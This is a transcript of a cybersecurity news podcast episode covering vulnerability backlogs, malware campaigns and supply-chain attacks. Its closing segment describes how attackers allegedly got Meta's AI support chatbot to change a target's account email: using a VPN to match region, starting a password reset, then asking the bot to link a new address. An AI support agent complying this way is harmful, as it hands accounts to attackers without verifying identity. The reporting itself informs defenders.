The bugs are piling up faster than the fixes.

A federal watchdog questions NIST over its vulnerability database backlog. Google patches an Android zero-day. Citizen Lab exposes a powerful location-tracking platform. Malware hides commands in Steam comments. Researchers spot AI-assisted malware development. Attackers compromise Red Hat’s npm namespace. DriveSurge spreads malware through ClickFix and fake updates. FreePBX patches a critical flaw. And Dashlane responds to a brute-force attack. Our guest is ⁠Laure Lydon⁠, Opening Chair for Infosecurity Europe and VP of Security and Infrastructure, Flo Health, sharing her expertise on digital health platforms. Meta’s AI support bot proves a bit too eager to help.

Today is Tuesday June 2nd 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A federal watchdog finds NIST failures undermining critical cybersecurity vulnerability tracking. 

NIST’s National Vulnerability Database (NVD), a critical resource used by government and industry to prioritize cybersecurity vulnerabilities, has become increasingly ineffective due to management failures, according to a Department of Commerce inspector general report. The backlog of unprocessed vulnerabilities more than doubled from 13,000 in February 2024 to over 27,000 by the end of 2025, undermining the database’s usefulness and public confidence.

The report attributes the crisis largely to poor planning after NIST stopped funding contractors who process vulnerability data. Although NIST promised to resolve the backlog by September 2024, it lacked a realistic strategy to meet its processing targets. The watchdog also found significant duplication of effort between NIST and CISA, including more than 21,000 overlapping vulnerability reviews and roughly $200,000 in wasted spending.

Additional concerns included weak communication with stakeholders and inefficient severity-scoring practices that often duplicated work already performed elsewhere. The inspector general recommended stronger coordination with CISA, reduced emphasis on vulnerability scoring, improved stakeholder engagement, and a sustainable plan to eliminate the backlog. NIST agreed with the recommendations and said it would begin implementing improvements immediately.

Google patches an Android zero-day. 

Google’s June 2026 Android security updates patch 124 vulnerabilities, including a high-severity zero-day, CVE-2025-48595, that has been exploited in limited, targeted attacks. The flaw affects Android 14 and later, allowing local attackers to execute code and escalate privileges. Google also fixed 18 critical vulnerabilities across Android system components, including flaws that could enable privilege escalation without user interaction. While Pixel devices will receive updates immediately, other Android vendors may take longer to deploy patches. Google urged users to install the latest Android updates as soon as they become available.

Citizen Lab highlights a powerful geolocation surveillance platform. 

A new report from Citizen Lab examines Webloc, a geolocation surveillance platform developed by Cobwebs Technologies and now sold by Penlink. The system uses location and advertising data collected from consumer mobile apps to track hundreds of millions of devices worldwide. According to the report, Webloc provides access to continuously updated records that can reveal sensitive details about individuals, including home and work locations, social relationships, religious affiliations, political views, and health-related activities. Researchers found evidence that the technology is used by law enforcement, intelligence, and military organizations in multiple countries, including the United States, Hungary, and El Salvador. The report also highlights concerns about limited transparency, oversight, and the potential for warrantless surveillance. Citizen Lab argues that the growing use of advertising-derived data for government surveillance illustrates how commercial data collection ecosystems can be repurposed for large-scale monitoring, raising significant privacy and civil liberties concerns. 

New malware hides instructions inside Steam Community profile comments. 

Researchers at GoDaddy uncovered a malware campaign affecting roughly 2,000 WordPress sites that uses an unusual command-and-control technique: hiding instructions inside Steam Community profile comments. The comments appear as harmless ASCII art, but invisible Unicode characters encode malicious payloads that infected sites decode to retrieve commands and download additional malware.

The campaign ultimately loads a disguised JavaScript file from a malicious domain and installs a persistent PHP backdoor. That backdoor allows attackers to remotely update malicious code across WordPress themes and plugins, making infections difficult to fully remove. The malware also uses multiple layers of obfuscation, including encryption, encoded strings, and legitimate WordPress functions to evade detection.

Researchers believe the initial compromise likely stems from stolen credentials, vulnerable plugins, or other common WordPress attack vectors. The campaign demonstrates how threat actors are increasingly abusing trusted platforms and unconventional techniques to conceal command-and-control infrastructure and maintain long-term access to compromised websites.

Researchers track a threat actor using AI coding tools to evade EDR. 

Sophos researchers discovered a threat actor using AI coding tools to develop and refine malware designed to evade endpoint detection and response (EDR) products from multiple vendors. The activity appeared in a testing lab containing AI-assisted Python scripts, many written in Russian, and tools for building stealthy malware loaders. Sophos emphasized that AI was not acting autonomously or embedded in the malware. Instead, human operators used AI to accelerate coding, testing, and research. Although the project was presented as a red team exercise, Sophos assessed it was likely intended for real-world post-exploitation activity and linked to ransomware and data theft operations.

Attackers hijack Red Hat’s npm namespace to distribute backdoored software.  

Attackers briefly hijacked Red Hat’s official npm namespace to distribute backdoored versions of 32 trusted software packages used across the company’s Hybrid Cloud Console ecosystem. According to researchers at ReversingLabs and Aikido Security, the malicious packages contained hidden preinstall scripts that executed automatically during installation, stealing cloud credentials, CI/CD tokens, npm credentials, and other sensitive data. The malware, identified as a variant of the Mini Shai-Hulud worm, also attempted to spread by using stolen publishing credentials to compromise additional packages. Investigators believe the attackers breached a GitHub Actions build pipeline and abused trusted publishing mechanisms based on OIDC tokens. Red Hat has since removed the malicious releases and published clean versions, but organizations that installed affected packages are advised to rotate credentials and review their development pipelines for signs of compromise.

DriveSurge uses ClickFix and FakeUpdates to spread malware. 

Researchers at Silent Push have identified a large-scale malware distribution operation by a threat actor known as DriveSurge, which uses compromised websites to redirect visitors to malicious infrastructure. The campaign relies on two common social engineering techniques: ClickFix, which tricks users into running malicious commands, and FakeUpdates, which impersonates browser update prompts to deliver malware. DriveSurge appears to operate as an initial access broker, using a pay-per-install model to provide footholds for other cybercriminals. Visitors are funneled through a traffic distribution system called zTDS, which determines the most effective lure for each target. Researchers linked thousands of compromised sites and more than 80 malicious domains to the campaign. The operation targets both Windows and macOS users, highlighting the growing scale and sophistication of malware delivery through trusted websites.

FreePBX finds a critical vulnerability affecting its User Control Panel. 

FreePBX has disclosed a critical vulnerability, CVE-2026-46376, that could allow unauthenticated attackers to access the User Control Panel through hard-coded credentials in the userman module. The flaw affects FreePBX versions 15.0.42 through 16.0.44 and 17.0.1 through 17.0.6 when the optional generic template setup is used. Successful exploitation could expose sensitive communications data and enable unauthorized changes to user settings. Administrators should update to userman versions 16.0.45 or 17.0.7, restrict management interfaces to trusted networks or VPN access, and enable multi-factor authentication or SAML to strengthen account security.

Dashlane suffers a brute force attack. 

Dashlane says a recent wave of account suspensions was triggered by automated defenses responding to brute-force login attacks. Affected users received alerts about login attempts and device registration requests from unfamiliar locations, leading some to suspect a phishing campaign. Dashlane confirmed the activity was caused by external attackers attempting to guess passwords and said the platform automatically locked targeted accounts to prevent unauthorized access. The company reported no evidence that its systems were compromised and has since restored affected accounts. While Dashlane marked the incident as resolved, some users have continued to report login issues and difficulties reaching support.

Meta’s AI support bot proves a bit too eager to help. 

Hackers claim they found an unexpectedly cooperative accomplice in Meta’s AI support chatbot. According to reports and videos shared in Telegram channels, attackers were able to take over Instagram accounts by persuading the AI support system to change the email address associated with a target profile. The process allegedly involved matching the victim’s region with a VPN, initiating a password reset, and then asking the chatbot to link a new email address. Once the AI complied, the attacker received reset codes and gained control of the account.

The alleged exploit coincided with a string of high-profile Instagram takeovers, including accounts linked to the Obama White House, the U.S. Space Force, and Sephora. Researchers and victims say the incident highlights a growing challenge with AI-driven support systems: when something goes wrong, there may be no human available to intervene.

In a touch of irony, Meta had recently promoted its AI support tools as a way to improve account security and prevent takeovers. Meta says the issue has now been fixed and that affected accounts are being secured. Still, the episode serves as a reminder that replacing human judgment with automation can sometimes produce results no one intended, except perhaps the attackers.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

And that’s the CyberWire Daily, brought to you by N2K CyberWire.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

 

N2K’s lead producer is Liz Stokes. We’re mixed by  Tré Hester, with original music by and sound design Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.